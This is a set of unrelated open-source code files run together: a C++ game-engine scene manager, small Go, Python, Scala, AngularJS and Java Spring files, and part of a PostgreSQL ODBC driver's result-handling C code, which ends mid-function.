for (uint i = 0; i < gameObject->childs.size(); i++)
{
SetStaticGameObject(gameObject->childs[i], isStatic, allChilds);
}
}
}
void M_SceneManager::LoadConfig(Config& config)
{
}
uint64 M_SceneManager::LoadScene(const char* file)
{
uint64 newID = Engine->moduleResources->FindResourceBase(file)->ID;
LoadScene(newID);
return newID;
}
void M_SceneManager::LoadScene(uint64 resourceID)
{
if (resourceID != 0)
{
DeleteAllGameObjects();
quadtree->Clear();
hCurrentScene.Set(resourceID); hCurrentScene.Get(); //<-- 'Get' So the resource gets loaded
std::vector<GameObject*> newGameObjects;
GetRoot()->CollectChilds(newGameObjects);
for (uint i = 0; i < newGameObjects.size(); i++)
{
if (newGameObjects[i]->isStatic)
{
quadtree->AddGameObject(newGameObjects[i]);
}
else
{
nonStatic.push_back(newGameObjects[i]);
}
}
}
}
void M_SceneManager::LoadModel(uint64 modelID)
{
std::vector<GameObject*> newGameObjects;
//Resource handle will be deleted at the end of the function and the resource will be freed
ResourceHandle<R_Model> rModelHandle(modelID);
R_Model* model = rModelHandle.Get();
if (model != nullptr)
{
//Port each model children into the current scene
model->root->SetParent(GetRoot());
//Add all gameObject's children to the static vector
model->root->CollectChilds(newGameObjects);
for (uint i = 0; i < newGameObjects.size(); i++)
{
nonStatic.push_back(newGameObjects[i]);
}
newGameObjects.clear();
}
else
{
LOG("[error] File '%s' could not be loaded");
}
}
GameObject* M_SceneManager::CreateGameObject(const char* name, GameObject* parent)
{
GameObject* go = new GameObject(parent ? parent : GetRoot(), name);
go->uid = random.Int();
return go;
}
void M_SceneManager::DeleteGameObject(GameObject* gameObject)
{
for (uint i = 0; i < toRemove.size(); i++)
{
if (toRemove[i] == gameObject)
return;
}
toRemove.push_back(gameObject);
Engine->OnRemoveGameObject(gameObject);
while (gameObject->childs.empty() == false) //"OnRemoveGameObject" will remove the gameObject from the childs list
{
DeleteGameObject(gameObject->childs[0]);
}
}
void M_SceneManager::OnRemoveGameObject(GameObject* gameObject)
{
//Remove from quadtree // non-static vector
if (quadtree->RemoveGameObject(gameObject) == false)
{
bool erased = false;
for (std::vector<const GameObject*>::iterator it = nonStatic.begin(); it != nonStatic.end(); it++)
{
if (*it == gameObject)
{
nonStatic.erase(it);
erased = true;
break;
}
}
if (erased == false)
LOG("[warning] deleted GameObject not found in quadtree nor non-static vector");
}
//Removing parent child
if (gameObject->parent)
{
GameObject* parent = gameObject->parent;
for (std::vector<GameObject*>::iterator it = parent->childs.begin(); it != parent->childs.end();)
{
*it == gameObject ? it = parent->childs.erase(it) : it++;
}
}
}
void M_SceneManager::OnClickSelection(const LineSegment& segment)
{
//Collecting quadtree GameObjects
std::map<float, const GameObject*> candidates;
quadtree->CollectCandidates(candidates, segment);
//Collecting non-static GameObjects
for (uint i = 0; i < nonStatic.size(); i++)
{
if (segment.Intersects(nonStatic[i]->GetAABB()))
{
float hit_near, hit_far;
if (segment.Intersects(nonStatic[i]->GetOBB(), hit_near, hit_far))
candidates[hit_near] = nonStatic[i];
}
}
const GameObject* toSelect = nullptr;
for (std::map<float, const GameObject*>::iterator it = candidates.begin(); it != candidates.end() && toSelect == nullptr; it++)
{
//Testing triangle by triangle
const Component* mesh = it->second->GetComponent<C_Mesh>();
if (mesh)
{
const R_Mesh* rMesh = ((C_Mesh*)mesh)->rMeshHandle.Get();
if (rMesh)
{
LineSegment local = segment;
local.Transform(it->second->GetComponent<C_Transform>()->GetGlobalTransform().Inverted());
for (uint v = 0; v < rMesh->buffersSize[R_Mesh::b_indices]; v += 3)
{
uint indexA = rMesh->indices[v] * 3;
vec a(&rMesh->vertices[indexA]);
uint indexB = rMesh->indices[v + 1] * 3;
vec b(&rMesh->vertices[indexB]);
uint indexC = rMesh->indices[v + 2] * 3;
vec c(&rMesh->vertices[indexC]);
Triangle triangle(a, b, c);
if (local.Intersects(triangle, nullptr, nullptr))
{
toSelect = it->second;
break;
}
}
}
}
}
Engine->moduleEditor->SelectSingle((GameObject*)toSelect);
}
GameObject* M_SceneManager::CreateCamera()
{
GameObject* camera = new GameObject(GetRoot(), "Camera");
camera->GetComponent<C_Transform>()->SetPosition(float3(10, 10, 0));
camera->CreateComponent(Component::Type::Camera);
camera->GetComponent<C_Camera>()->Look(float3(0, 5, 0));
camera->uid = random.Int();
//Keeping a reference to the last camera, by now
hCurrentScene.Get()->mainCamera = camera->GetComponent<C_Camera>();
return camera;
}
const C_Camera* M_SceneManager::GetMainCamera() const
{
return hCurrentScene.Get()->mainCamera;
}
void M_SceneManager::Play()
{
Time::Start(60);
Engine->moduleResources->SaveResourceAs(hCurrentScene.Get(), "Engine", "tmp.scene");
}
void M_SceneManager::Stop()
{
Time::Stop();
R_Scene* realScene = hCurrentScene.Get();
realScene->instances++; //Increasing instances just in case. LoadScene will release one instance as the resource is changed
LoadScene("Engine/tmp.scene");
realScene->root = hCurrentScene.Get()->root;
hCurrentScene.Get()->root = nullptr;
hCurrentScene.Set(realScene);
}
void M_SceneManager::ClearScene(uint64 sceneID)
{
std::vector<ResourceHandle<R_Scene>>::iterator it;
for (it = activeScenes.begin(); it != activeScenes.end(); ++it)
{
if ((*it).GetID() == sceneID)
{
activeScenes.erase(it);
return;
}
}
}
void M_SceneManager::TestGameObjectsCulling(std::vector<const GameObject*>& vector, std::vector<const GameObject*>& final)
{
for (uint i = 0; i < vector.size(); i++)
{
if (Engine->renderer3D->culling_camera->frustum.Intersects(vector[i]->GetAABB()))
{
final.push_back(vector[i]);
}
}
}
void M_SceneManager::UpdateAllGameObjects(GameObject* gameObject, float dt)
{
GetRoot()->Update(dt);
}
void M_SceneManager::DrawAllGameObjects(GameObject* gameObject)
{
if (gameObject->name != "root");
gameObject->Draw(true, false, drawBounds, drawBoundsSelected);
for (uint i = 0; i < gameObject->childs.size(); i++)
{
DrawAllGameObjects(gameObject->childs[i]);
}
}
void M_SceneManager::FindGameObjectByID(uint id, GameObject* gameObject, GameObject** ret)
{
if (gameObject->uid == id)
{
if (*ret != nullptr)
LOG("[error] Conflict: GameObjects with same UID");
*ret = gameObject;
}
//Optimization vs security: if ret != nullptr we can stop searching
//If we search for all game objects, we can find uid conflicts if any
for (uint i = 0; i < gameObject->childs.size(); i++)
{
FindGameObjectByID(id, gameObject->childs[i], ret);
}
}
void M_SceneManager::DeleteAllGameObjects()
{
if (hCurrentScene.GetID())
RELEASE(hCurrentScene.Get()->root);
}
void M_SceneManager::DeleteToRemoveGameObjects()
{
for (std::vector<GameObject*>::iterator it = toRemove.begin(); it != toRemove.end(); it++)
{
RELEASE(*it);
}
toRemove.clear();
}
|
entropyio/go-entropy
|
database/memorydb/memorydb_test.go
|
<filename>database/memorydb/memorydb_test.go
package memorydb
import (
"testing"
)
func TestMemoryDB(t *testing.T) {
t.Run("DatabaseSuite", func(t *testing.T) {
dbtest.TestDatabaseSuite(t, func() ethdb.KeyValueStore {
return New()
})
})
}
|
zichuan-scott-xu/automl-workflow
|
examples/automl_freiburg/ASlibScenario/setup.py
|
import os
import setuptools
requirements = ['numpy', 'scipy', 'pyyaml', 'liac-arff', 'pandas']
setuptools.setup(
name="aslib_scenario",
version="1.0.0",
author="<NAME>",
author_email="<EMAIL>",
description=("Python Package to read scenario from the algorithm selection library"),
license="2-clause BSD",
keywords="algortithm selection",
url="",
packages=setuptools.find_packages(exclude=['test', 'source']),
classifiers=[
"Development Status :: 3 - Alpha",
"Topic :: Utilities",
"Topic :: Scientific/Engineering",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"License :: OSI Approved :: 2-clause BSD",
],
platforms=['Linux'],
install_requires=requirements,
tests_require=['mock',
'nose'],
test_suite='nose.collector'
)
|
sfwn/go-utils
|
errorx/multi_error.go
|
package errorx
import (
"bytes"
"fmt"
)
// MultiError 多个错误的集合类型
type MultiError interface {
error
Num() int // 返回错误的数量
MaybeUnwrap() error
}
// Errors is a slice of errors implementing the error interface.
type Errors []error
// NewMultiError 创建错误集合
func NewMultiError(errs ...error) MultiError {
merr := make(Errors, 0, len(errs))
for _, err := range errs {
if err != nil {
merr = append(merr, err)
}
}
return merr
}
func (errs Errors) Error() string {
if len(errs) == 0 {
return ""
} else if len(errs) == 1 {
return errs[0].Error()
}
buf := &bytes.Buffer{}
fmt.Fprintf(buf, "%d error(s) occurred:", len(errs))
for _, err := range errs {
fmt.Fprintf(buf, "\n* %s", err)
}
return buf.String()
}
func (errs Errors) Num() int {
return len(errs)
}
func (errs *Errors) Append(err error) {
*errs = append(*errs, err)
return
}
// MaybeUnwrap returns nil if len(errs) is 0. It returns the first and only
// contained error as error if len(errs is 1). In all other cases, it returns
// the Errors directly. This is helpful for returning a Errors in a way
// that only uses the Errors if needed.
func (errs Errors) MaybeUnwrap() error {
switch len(errs) {
case 0:
return nil
case 1:
return errs[0]
default:
return errs
}
}
|
ankurqss2009/AUSK_NEW
|
modules/post/server-scala/src/main/scala/repositories/PostRepository.scala
|
package repositories
import com.byteslounge.slickrepo.repository.Repository
import javax.inject.Inject
import model.{PaginatedResult, Pagination, PaginationParams, Post}
import model.PostTable.PostTable
import slick.ast.BaseTypedType
import slick.jdbc.JdbcProfile
import scala.concurrent.ExecutionContext
class PostRepository @Inject()(override val driver: JdbcProfile)(implicit executionContext: ExecutionContext)
extends Repository[Post, Int](driver)
with Pagination {
import driver.api._
val pkType = implicitly[BaseTypedType[Int]]
val tableQuery = TableQuery[PostTable]
type TableType = PostTable
def getPaginatedObjectsList(paginationParams: PaginationParams): DBIO[PaginatedResult[Post]] = {
val (offset, limit) = (paginationParams.offset, paginationParams.limit)
val paginatedQuery = withPagination(tableQuery, paginationParams)
for {
totalCount <- tableQuery.size.result
paginatedResult <- paginatedQuery.result
} yield
PaginatedResult(
totalCount = totalCount,
entities = paginatedResult.toList,
hasNextPage = (totalCount - (offset + limit)) > 0
)
}
}
|
xlinx69/leasestack
|
public/modules/refinancements/services/refinancements.client.service.js
|
'use strict';
//Refinancements service used to communicate Refinancements REST endpoints
angular.module('refinancements').factory('Refinancements', ['$resource',
function($resource) {
return $resource('refinancements/:refinancementId', { refinancementId: '@_id'
}, {
update: {
method: 'PUT'
}
});
}
]);
|
yrj2011/mycrawler
|
mycrawler-tutorial/mycrawler-tutorial-spring/Spring AOP/AOP/aop after throwing advice/aop/src/com/springinaction/springidol/Main.java
|
<reponame>yrj2011/mycrawler
package com.springinaction.springidol;
import org.springframework.context.ApplicationContext;
import org.springframework.context.support.ClassPathXmlApplicationContext;
public class Main {
private static ApplicationContext context;
public static void main(String[] args) {
context = new ClassPathXmlApplicationContext("abc.xml");
Performer performer=(Performer)context.getBean("performer");
try{
System.out.println("ARTIST ; 1");
performer.validateAge(20);
}catch(Exception ex){
System.out.println("Invalid Artist : "+ex);
}
System.out.println("AFTER THROWING ADVICE : Boo! We want our money back!");
try{
System.out.println("ARTIST ; 2");
performer.validateAge(10);
}catch(Exception ex){
System.out.println("Invalid Artist : "+ex);
}
}
}
|
abdalla/docker-image-for-python-boto3-mysql
|
deps/unixODBC-2.3.4/Drivers/Postgre7.1/results.c
|
<gh_stars>0
/* Module: results.c
*
* Description: This module contains functions related to
* retrieving result information through the ODBC API.
*
* Classes: n/a
*
* API functions: SQLRowCount, SQLNumResultCols, SQLDescribeCol, SQLColAttributes,
* SQLGetData, SQLFetch, SQLExtendedFetch,
* SQLMoreResults(NI), SQLSetPos, SQLSetScrollOptions(NI),
* SQLSetCursorName, SQLGetCursorName
*
* Comments: See "notice.txt" for copyright and license information.
*
*/
#ifdef HAVE_CONFIG_H
#include "config.h"
#endif
#include <string.h>
#include "psqlodbc.h"
#include "dlg_specific.h"
#include "environ.h"
#include "connection.h"
#include "statement.h"
#include "bind.h"
#include "qresult.h"
#include "convert.h"
#include "pgtypes.h"
#include <stdio.h>
#ifndef WIN32
#include "isqlext.h"
#else
#include <windows.h>
#include <sqlext.h>
#endif
extern GLOBAL_VALUES globals;
SQLRETURN SQLRowCount(SQLHSTMT hstmt,
SQLLEN *pcrow)
{
static char* const func="SQLRowCount";
StatementClass *stmt = (StatementClass *) hstmt;
QResultClass *res;
char *msg, *ptr;
if ( ! stmt) {
SC_log_error(func, "", NULL);
return SQL_INVALID_HANDLE;
}
if (stmt->manual_result) {
if (pcrow)
*pcrow = -1;
return SQL_SUCCESS;
}
if(stmt->statement_type == STMT_TYPE_SELECT) {
if (stmt->status == STMT_FINISHED) {
res = SC_get_Result(stmt);
if(res && pcrow) {
*pcrow = globals.use_declarefetch ? -1 : QR_get_num_tuples(res);
return SQL_SUCCESS;
}
}
} else {
res = SC_get_Result(stmt);
if (res && pcrow) {
msg = QR_get_command(res);
mylog("*** msg = '%s'\n", msg);
trim(msg); /* get rid of trailing spaces */
ptr = strrchr(msg, ' ');
if (ptr) {
*pcrow = atoi(ptr+1);
mylog("**** SQLRowCount(): THE ROWS: *pcrow = %d\n", *pcrow);
}
else {
*pcrow = -1;
mylog("**** SQLRowCount(): NO ROWS: *pcrow = %d\n", *pcrow);
}
return SQL_SUCCESS;
}
}
SC_log_error(func, "Bad return value", stmt);
return SQL_ERROR;
}
/* This returns the number of columns associated with the database */
/* attached to "hstmt". */
RETCODE SQL_API SQLNumResultCols(
HSTMT hstmt,
SWORD FAR *pccol)
{
static char* const func="SQLNumResultCols";
StatementClass *stmt = (StatementClass *) hstmt;
QResultClass *result;
char parse_ok;
if ( ! stmt) {
SC_log_error(func, "", NULL);
return SQL_INVALID_HANDLE;
}
SC_clear_error(stmt);
parse_ok = FALSE;
if (globals.parse && stmt->statement_type == STMT_TYPE_SELECT) {
if (stmt->parse_status == STMT_PARSE_NONE) {
mylog("SQLNumResultCols: calling parse_statement on stmt=%u\n", stmt);
parse_statement(stmt);
}
if (stmt->parse_status != STMT_PARSE_FATAL) {
parse_ok = TRUE;
*pccol = stmt->nfld;
mylog("PARSE: SQLNumResultCols: *pccol = %d\n", *pccol);
}
}
if ( ! parse_ok) {
SC_pre_execute(stmt);
result = SC_get_Result(stmt);
mylog("SQLNumResultCols: result = %u, status = %d, numcols = %d\n", result, stmt->status, result != NULL ? QR_NumResultCols(result) : -1);
if (( ! result) || ((stmt->status != STMT_FINISHED) && (stmt->status != STMT_PREMATURE)) ) {
/* no query has been executed on this statement */
SC_set_error(stmt, STMT_SEQUENCE_ERROR, "No query has been executed with that handle");
SC_log_error(func, "", stmt);
return SQL_ERROR;
}
*pccol = QR_NumResultCols(result);
}
return SQL_SUCCESS;
}
/* - - - - - - - - - */
/* Return information about the database column the user wants */
/* information about. */
RETCODE SQL_API SQLDescribeCol(
HSTMT hstmt,
UWORD icol,
UCHAR FAR *szColName,
SWORD cbColNameMax,
SWORD FAR *pcbColName,
SWORD FAR *pfSqlType,
SQLULEN FAR *pcbColDef,
SWORD FAR *pibScale,
SWORD FAR *pfNullable)
{
static char* const func="SQLDescribeCol";
/* gets all the information about a specific column */
StatementClass *stmt = (StatementClass *) hstmt;
QResultClass *res;
char *col_name = NULL;
Int4 fieldtype = 0;
int precision = 0;
ConnInfo *ci;
char parse_ok;
char buf[255];
int len = 0;
RETCODE result;
mylog("%s: entering...\n", func);
if ( ! stmt) {
SC_log_error(func, "", NULL);
return SQL_INVALID_HANDLE;
}
ci = &(stmt->hdbc->connInfo);
SC_clear_error(stmt);
/* Dont check for bookmark column. This is the responsibility
of the driver manager.
*/
icol--; /* use zero based column numbers */
parse_ok = FALSE;
if (globals.parse && stmt->statement_type == STMT_TYPE_SELECT) {
if (stmt->parse_status == STMT_PARSE_NONE) {
mylog("SQLDescribeCol: calling parse_statement on stmt=%u\n", stmt);
parse_statement(stmt);
}
mylog("PARSE: DescribeCol: icol=%d, stmt=%u, stmt->nfld=%d, stmt->fi=%u\n", icol, stmt, stmt->nfld, stmt->fi);
if (stmt->parse_status != STMT_PARSE_FATAL && stmt->fi && stmt->fi[icol]) {
if (icol >= stmt->nfld) {
SC_set_error(stmt, STMT_INVALID_COLUMN_NUMBER_ERROR, "Invalid column number in DescribeCol.");
SC_log_error(func, "", stmt);
return SQL_ERROR;
}
mylog("DescribeCol: getting info for icol=%d\n", icol);
fieldtype = stmt->fi[icol]->type;
col_name = stmt->fi[icol]->name;
precision = stmt->fi[icol]->precision;
mylog("PARSE: fieldtype=%d, col_name='%s', precision=%d\n", fieldtype, col_name, precision);
if (fieldtype > 0)
parse_ok = TRUE;
}
}
/* If couldn't parse it OR the field being described was not parsed (i.e., because
it was a function or expression, etc, then do it the old fashioned way.
*/
if ( ! parse_ok) {
SC_pre_execute(stmt);
res = SC_get_Result(stmt);
mylog("**** SQLDescribeCol: res = %u, stmt->status = %d, !finished=%d, !premature=%d\n", res, stmt->status, stmt->status != STMT_FINISHED, stmt->status != STMT_PREMATURE);
if ( (NULL == res) || ((stmt->status != STMT_FINISHED) && (stmt->status != STMT_PREMATURE))) {
/* no query has been executed on this statement */
SC_set_error(stmt, STMT_SEQUENCE_ERROR, "No query has been assigned to this statement.");
SC_log_error(func, "", stmt);
return SQL_ERROR;
}
if (icol >= QR_NumResultCols(res)) {
SC_set_error(stmt, STMT_INVALID_COLUMN_NUMBER_ERROR, "Invalid column number in DescribeCol.");
sprintf(buf, "Col#=%d, #Cols=%d", icol, QR_NumResultCols(res));
SC_log_error(func, buf, stmt);
return SQL_ERROR;
}
col_name = QR_get_fieldname(res, icol);
fieldtype = QR_get_field_type(res, icol);
precision = pgtype_precision(stmt, fieldtype, icol, globals.unknown_sizes); /* atoi(ci->unknown_sizes) */
}
mylog("describeCol: col %d fieldname = '%s'\n", icol, col_name);
mylog("describeCol: col %d fieldtype = %d\n", icol, fieldtype);
mylog("describeCol: col %d precision = %d\n", icol, precision);
result = SQL_SUCCESS;
/************************/
/* COLUMN NAME */
/************************/
len = strlen(col_name);
if (pcbColName)
*pcbColName = len;
if (szColName) {
strncpy_null((char*)szColName, col_name, cbColNameMax);
if (len >= cbColNameMax) {
result = SQL_SUCCESS_WITH_INFO;
SC_set_error(stmt, STMT_TRUNCATED, "The buffer was too small for the result.");
}
}
/************************/
/* SQL TYPE */
/************************/
if (pfSqlType) {
*pfSqlType = pgtype_to_sqltype(stmt, fieldtype);
mylog("describeCol: col %d *pfSqlType = %d\n", icol, *pfSqlType);
}
/************************/
/* PRECISION */
/************************/
if (pcbColDef) {
if ( precision < 0)
precision = 0; /* "I dont know" */
*pcbColDef = precision;
mylog("describeCol: col %d *pcbColDef = %d\n", icol, *pcbColDef);
}
/************************/
/* SCALE */
/************************/
if (pibScale) {
Int2 scale;
scale = pgtype_scale(stmt, fieldtype, icol);
if(scale == -1) { scale = 0; }
*pibScale = scale;
mylog("describeCol: col %d *pibScale = %d\n", icol, *pibScale);
}
/************************/
/* NULLABILITY */
/************************/
if (pfNullable) {
*pfNullable = (parse_ok) ? stmt->fi[icol]->nullable : pgtype_nullable(stmt, fieldtype);
mylog("describeCol: col %d *pfNullable = %d\n", icol, *pfNullable);
}
return result;
}
/* Returns result column descriptor information for a result set. */
SQLRETURN SQLColAttributes(
SQLHSTMT hstmt,
SQLUSMALLINT icol,
SQLUSMALLINT fDescType,
SQLPOINTER rgbDesc,
SQLSMALLINT cbDescMax,
SQLSMALLINT *pcbDesc,
SQLLEN *pfDesc)
{
static char* const func = "SQLColAttributes";
StatementClass *stmt = (StatementClass *) hstmt;
Int4 field_type = 0;
ConnInfo *ci;
int unknown_sizes;
int cols = 0;
char parse_ok;
RETCODE result;
char *p = NULL;
int len = 0, value = 0;
mylog("%s: entering...\n", func);
if( ! stmt) {
SC_log_error(func, "", NULL);
return SQL_INVALID_HANDLE;
}
ci = &(stmt->hdbc->connInfo);
/* Dont check for bookmark column. This is the responsibility
of the driver manager. For certain types of arguments, the column
number is ignored anyway, so it may be 0.
*/
icol--;
unknown_sizes = globals.unknown_sizes; /* atoi(ci->unknown_sizes); */
if (unknown_sizes == UNKNOWNS_AS_DONTKNOW) /* not appropriate for SQLColAttributes() */
unknown_sizes = UNKNOWNS_AS_MAX;
parse_ok = FALSE;
if (globals.parse && stmt->statement_type == STMT_TYPE_SELECT) {
if (stmt->parse_status == STMT_PARSE_NONE) {
mylog("SQLColAttributes: calling parse_statement\n");
parse_statement(stmt);
}
cols = stmt->nfld;
/* Column Count is a special case. The Column number is ignored
in this case.
*/
if (fDescType == SQL_COLUMN_COUNT) {
if (pfDesc)
*pfDesc = cols;
return SQL_SUCCESS;
}
if (stmt->parse_status != STMT_PARSE_FATAL && stmt->fi && stmt->fi[icol]) {
if (icol >= cols) {
SC_set_error(stmt, STMT_INVALID_COLUMN_NUMBER_ERROR, "Invalid column number in DescribeCol.");
SC_log_error(func, "", stmt);
return SQL_ERROR;
}
field_type = stmt->fi[icol]->type;
if (field_type > 0)
parse_ok = TRUE;
}
}
if ( ! parse_ok) {
SC_pre_execute(stmt);
mylog("**** SQLColAtt: result = %u, status = %d, numcols = %d\n", stmt->result, stmt->status, stmt->result != NULL ? QR_NumResultCols(stmt->result) : -1);
if ( (NULL == stmt->result) || ((stmt->status != STMT_FINISHED) && (stmt->status != STMT_PREMATURE)) ) {
SC_set_error(stmt, STMT_SEQUENCE_ERROR, "Can't get column attributes: no result found.");
SC_log_error(func, "", stmt);
return SQL_ERROR;
}
cols = QR_NumResultCols(stmt->result);
/* Column Count is a special case. The Column number is ignored
in this case.
*/
if (fDescType == SQL_COLUMN_COUNT) {
if (pfDesc)
*pfDesc = cols;
return SQL_SUCCESS;
}
if (icol >= cols) {
SC_set_error(stmt, STMT_INVALID_COLUMN_NUMBER_ERROR, "Invalid column number in DescribeCol.");
SC_log_error(func, "", stmt);
return SQL_ERROR;
}
field_type = QR_get_field_type(stmt->result, icol);
}
mylog("colAttr: col %d field_type = %d\n", icol, field_type);
switch(fDescType) {
case SQL_COLUMN_AUTO_INCREMENT:
value = pgtype_auto_increment(stmt, field_type);
if (value == -1) /* non-numeric becomes FALSE (ODBC Doc) */
value = FALSE;
break;
case SQL_COLUMN_CASE_SENSITIVE:
value = pgtype_case_sensitive(stmt, field_type);
break;
/* This special case is handled above.
case SQL_COLUMN_COUNT:
*/
case SQL_COLUMN_DISPLAY_SIZE:
value = (parse_ok) ? stmt->fi[icol]->display_size : pgtype_display_size(stmt, field_type, icol, unknown_sizes);
mylog("SQLColAttributes: col %d, display_size= %d\n", icol, value);
break;
case SQL_COLUMN_LABEL:
if (parse_ok && stmt->fi[icol]->alias[0] != '\0') {
p = stmt->fi[icol]->alias;
mylog("SQLColAttr: COLUMN_LABEL = '%s'\n", p);
break;
} /* otherwise same as column name -- FALL THROUGH!!! */
case SQL_COLUMN_NAME:
p = (parse_ok) ? stmt->fi[icol]->name : QR_get_fieldname(stmt->result, icol);
mylog("SQLColAttr: COLUMN_NAME = '%s'\n", p);
break;
case SQL_COLUMN_LENGTH:
value = (parse_ok) ? stmt->fi[icol]->length : pgtype_length(stmt, field_type, icol, unknown_sizes);
mylog("SQLColAttributes: col %d, length = %d\n", icol, value);
break;
case SQL_COLUMN_MONEY:
value = pgtype_money(stmt, field_type);
break;
case SQL_COLUMN_NULLABLE:
value = (parse_ok) ? stmt->fi[icol]->nullable : pgtype_nullable(stmt, field_type);
break;
case SQL_COLUMN_OWNER_NAME:
p = "";
break;
case SQL_COLUMN_PRECISION:
value = (parse_ok) ? stmt->fi[icol]->precision : pgtype_precision(stmt, field_type, icol, unknown_sizes);
mylog("SQLColAttributes: col %d, precision = %d\n", icol, value);
break;
case SQL_COLUMN_QUALIFIER_NAME:
p = "";
break;
case SQL_COLUMN_SCALE:
value = pgtype_scale(stmt, field_type, icol);
break;
case SQL_COLUMN_SEARCHABLE:
value = pgtype_searchable(stmt, field_type);
break;
case SQL_COLUMN_TABLE_NAME:
p = (parse_ok && stmt->fi[icol]->ti) ? stmt->fi[icol]->ti->name : "";
mylog("SQLColAttr: TABLE_NAME = '%s'\n", p);
break;
case SQL_COLUMN_TYPE:
value = pgtype_to_sqltype(stmt, field_type);
break;
case SQL_COLUMN_TYPE_NAME:
p = pgtype_to_name(stmt, field_type);
break;
case SQL_COLUMN_UNSIGNED:
value = pgtype_unsigned(stmt, field_type);
if(value == -1) /* non-numeric becomes TRUE (ODBC Doc) */
value = TRUE;
break;
case SQL_COLUMN_UPDATABLE:
/* Neither Access or Borland care about this.
if (field_type == PG_TYPE_OID)
*pfDesc = SQL_ATTR_READONLY;
else
*/
value = SQL_ATTR_WRITE;
mylog("SQLColAttr: UPDATEABLE = %d\n", value);
break;
}
result = SQL_SUCCESS;
if (p) { /* char/binary data */
len = strlen(p);
if (rgbDesc) {
strncpy_null((char *)rgbDesc, p, (size_t)cbDescMax);
if (len >= cbDescMax) {
result = SQL_SUCCESS_WITH_INFO;
SC_set_error(stmt, STMT_TRUNCATED, "The buffer was too small for the result.");
}
}
if (pcbDesc)
*pcbDesc = len;
}
else { /* numeric data */
if (pfDesc)
*pfDesc = value;
}
return result;
}
/* Returns result data for a single column in the current row. */
RETCODE SQL_API PG_SQLGetData(
HSTMT hstmt,
UWORD icol,
SWORD fCType,
PTR rgbValue,
SDWORD cbValueMax,
SDWORD FAR *pcbValue)
{
static char* const func="SQLGetData";
QResultClass *res;
StatementClass *stmt = (StatementClass *) hstmt;
int num_cols, num_rows;
Int4 field_type;
void *value = NULL;
int result;
char get_bookmark = FALSE;
mylog("SQLGetData: enter, stmt=%u\n", stmt);
if( ! stmt) {
SC_log_error(func, "", NULL);
return SQL_INVALID_HANDLE;
}
res = stmt->result;
if (STMT_EXECUTING == stmt->status) {
SC_set_error(stmt, STMT_SEQUENCE_ERROR, "Can't get data while statement is still executing.");
SC_log_error(func, "", stmt);
return SQL_ERROR;
}
if (stmt->status != STMT_FINISHED) {
SC_set_error(stmt, STMT_STATUS_ERROR, "GetData can only be called after the successful execution on a SQL statement");
SC_log_error(func, "", stmt);
return SQL_ERROR;
}
if (icol == 0) {
if (stmt->options.use_bookmarks == SQL_UB_OFF) {
SC_set_error(stmt, STMT_COLNUM_ERROR, "Attempt to retrieve bookmark with bookmark usage disabled");
SC_log_error(func, "", stmt);
return SQL_ERROR;
}
/* Make sure it is the bookmark data type */
if (fCType != SQL_C_BOOKMARK && fCType != SQL_C_BINARY ) {
SC_set_error(stmt, STMT_PROGRAM_TYPE_OUT_OF_RANGE, "Column 0 is not of type SQL_C_BOOKMARK");
SC_log_error(func, "", stmt);
return SQL_ERROR;
}
get_bookmark = TRUE;
}
else {
/* use zero-based column numbers */
icol--;
/* make sure the column number is valid */
num_cols = QR_NumResultCols(res);
if (icol >= num_cols) {
SC_set_error(stmt, STMT_INVALID_COLUMN_NUMBER_ERROR, "Invalid column number.");
SC_log_error(func, "", stmt);
return SQL_ERROR;
}
}
if ( stmt->manual_result || ! globals.use_declarefetch) {
/* make sure we're positioned on a valid row */
num_rows = QR_get_num_tuples(res);
if((stmt->currTuple < 0) ||
(stmt->currTuple >= num_rows)) {
SC_set_error(stmt, STMT_INVALID_CURSOR_STATE_ERROR, "Not positioned on a valid row for GetData.");
SC_log_error(func, "", stmt);
return SQL_ERROR;
}
mylog(" num_rows = %d\n", num_rows);
if ( ! get_bookmark) {
if ( stmt->manual_result) {
value = QR_get_value_manual(res, stmt->currTuple, icol);
}
else {
value = QR_get_value_backend_row(res, stmt->currTuple, icol);
}
mylog(" value = '%s'\n", value);
}
}
else { /* it's a SOCKET result (backend data) */
if (stmt->currTuple == -1 || ! res || ! res->tupleField) {
SC_set_error(stmt, STMT_INVALID_CURSOR_STATE_ERROR, "Not positioned on a valid row for GetData.");
SC_log_error(func, "", stmt);
return SQL_ERROR;
}
if ( ! get_bookmark)
value = QR_get_value_backend(res, icol);
mylog(" socket: value = '%s'\n", value);
}
if ( get_bookmark) {
*((UDWORD *) rgbValue) = SC_get_bookmark(stmt);
if (pcbValue)
*pcbValue = 4;
return SQL_SUCCESS;
}
field_type = QR_get_field_type(res, icol);
mylog("**** SQLGetData: icol = %d, fCType = %d, field_type = %d, value = '%s'\n", icol, fCType, field_type, value);
stmt->current_col = icol;
result = copy_and_convert_field(stmt, field_type, value,
fCType, rgbValue, cbValueMax, (SQLLEN*)pcbValue);
stmt->current_col = -1;
switch(result) {
case COPY_OK:
return SQL_SUCCESS;
case COPY_UNSUPPORTED_TYPE:
SC_set_error(stmt, STMT_RESTRICTED_DATA_TYPE_ERROR, "Received an unsupported type from Postgres.");
SC_log_error(func, "", stmt);
return SQL_ERROR;
case COPY_UNSUPPORTED_CONVERSION:
SC_set_error(stmt, STMT_RESTRICTED_DATA_TYPE_ERROR, "Couldn't handle the necessary data type conversion.");
SC_log_error(func, "", stmt);
return SQL_ERROR;
case COPY_RESULT_TRUNCATED:
SC_set_error(stmt, STMT_TRUNCATED, "The buffer was too small for the result.");
return SQL_SUCCESS_WITH_INFO;
case COPY_GENERAL_ERROR: /* error msg already filled in */
SC_log_error(func, "", stmt);
return SQL_ERROR;
case COPY_NO_DATA_FOUND:
/* SC_log_error(func, "no data found", stmt); */
return SQL_NO_DATA_FOUND;
default:
SC_set_error(stmt, STMT_INTERNAL_ERROR, "Unrecognized return value from copy_and_convert_field.");
SC_log_error(func, "", stmt);
return SQL_ERROR;
}
}
SQLRETURN SQLGetData(SQLHSTMT hstmt,
SQLUSMALLINT icol, SQLSMALLINT fCType,
SQLPOINTER rgbValue, SQLLEN cbValueMax,
SQLLEN *pcbValue)
{
return PG_SQLGetData( hstmt,
icol,
fCType,
rgbValue,
cbValueMax,
(SDWORD FAR *)pcbValue );
}
/* Returns data for bound columns in the current row ("hstmt->iCursor"), */
/* advances the cursor. */
RETCODE SQL_API PG_SQLFetch(
HSTMT hstmt)
{
static char* const func = "SQLFetch";
StatementClass *stmt = (StatementClass *) hstmt;
QResultClass *res;
mylog("SQLFetch: stmt = %u, stmt->result= %u\n", stmt, stmt->result);
if ( ! stmt) {
